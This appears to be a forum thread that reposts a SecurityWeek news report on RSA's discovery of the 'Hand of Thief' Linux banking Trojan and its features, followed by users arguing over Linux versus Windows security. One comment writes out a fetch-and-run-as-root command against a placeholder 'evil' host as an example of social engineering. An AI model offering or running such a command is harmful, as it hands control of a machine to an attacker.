Matt

New Banking Trojan Targets Linux Users


Researchers from RSA have uncovered a new banking Trojan designed to steal information from machines running the Linux operating system.

Dubbed “Hand of Thief”, the Trojan is reportedly being sold in closed cybercrime communities for $2,000 with free updates.

“The current functionality includes form grabbers and backdoor capabilities, however, it’s expected that the Trojan will have a new suite of web injections and graduate to become full-blown banking malware in the very near future,” Limor Kessem, cyber intelligence expert at RSA, explained in a blog post.

Assuming development continues and the new Trojan becomes fully functional, RSA expects the price to increase to $3,000, along with $550 for major version releases, prices that coincide with other similar malware that targets Windows.

According to RSA, the developer behind Hand of Thief claims it has been tested on 15 different Linux desktop distributions, including Ubuntu, Fedora and Debian. The malware also reportedly supports 8 different desktop Linux environments, including GNOME and KDE.

RSA researchers got their hands on the malware builder along with the server side source code, which allowed them to see some of the features that include:

• Form grabber for both HTTP and HTTPS sessions; supported browsers include Firefox, Google Chrome, as well as several other Linux-only browsers, such as Chromium, Aurora and Iceweasel.

• Block list preventing access to specified hosts (a similar deployment used by the Citadel Trojan to isolate bots from security updates and anti-virus providers)

• Backdoor, backconnect and SOCKS5 proxy

• Anti-research tool box, which includes anti-VM, anti-sandbox and anti-debugger

In terms of backend features, the developer has already put together a basic administration panel for the Trojan, which enables the botmaster to control the infected machines reporting to it. According to Kessem, the control panel shows a list of infected machines (bots), and provides a querying interface, along with other basic bot management options.

In addition to having cookie-stealing functionality, information captured by Hand of Thief’s command and control infrastructure includes stolen credentials which are stored in a MySQL database, along with other details including timestamp, user agent, website visited and POST data.

“Although Hand of Thief comes to the underground at a time when commercial Trojans are high in demand, writing malware for the Linux OS is uncommon, and for good reason,” Kessem wrote. “In comparison to Windows, Linux’s user base is smaller, considerably reducing the number of potential victims and thereby the potential fraud gains. Secondly, since Linux is open source, vulnerabilities are patched relatively quickly by the community of users. Backing this up is the fact that there aren’t significant exploit packs targeting the platform. In fact, in a conversation with the malware’s sales agent, he himself suggested using email and social engineering as the infection vector.”

Hand of Thief is not alone in being an emerging banking malware threat. Late last month, another new professional-grade banking Trojan was uncovered that RSA researchers said could soon rival Zeus, SpyEye and Citadel in how effectively it spreads. Dubbed KINS, the banking Trojan has several features in common with Zeus and SpyEye, as well as having a similar DLL-plugin-based architecture.

Source: SecurityWeek.Com

Mind that there are some people around here who have more years on Linux than you have in age.... AlMalalah! Here, so you can see what is routine for some people around here... they don't even apply an update without first testing that update in a virtual machine... not to mention installing programs on the main system... I'm sure you notice when something is wrong on Windows... :)


You have no clue, neither you nor the ones who liked your post.

It's just as easy to infect a Linux machine as it is to infect a Windows one. Can you defend yourself on Windows? You are the product of the antivirus vendors' marketing campaigns. On Linux it's enough to manipulate some sucker into running wget http://x.x/evil | sudo sh for you to burn him, and on Windows you all know how easy it is. Want safety? Mount your partitions read-only or use snapshots in VMware. These Linux "trojans" are showing up now because more and more users are migrating to free and open-source solutions, and since most of them are about as savvy as you, a grsec patch, ACLs and strict iptables rules are fantasies. You're hardcore internet users, you sit on Windows with NOD32 and you talk about security :))

I haven't had an antivirus for about 3-4 years and I've never been infected with any virus, even though I've downloaded and installed plenty of cracked programs, patches and other stuff. I run a scan every few months, but every time there's nothing. And I haven't run any stealers either.

And you should know that it's not an antivirus that guarantees your safety. What matters is what you click on, what you run, what links you open and so on. You can see which processes are running on the PC, which DLLs each process uses, subprocesses and so on. On top of that, you can test to see exactly what a given program reads/writes/modifies whenever you want.

I know there may be many who have been using Linux for a long time, but compared to the rest they are a very small share. Many installed Linux because they heard it's more secure, but on Linux a great many don't even know how to open the task manager, let alone view processes and subprocesses and what each one does, what it accesses, what it reads, writes, etc. Linux looks good with Compiz because the windows move nicely, there's fire and lots of other cool effects, but if you don't know how to check what's going on and what's up with each directory/file there, it's far less secure than they say Windows is.
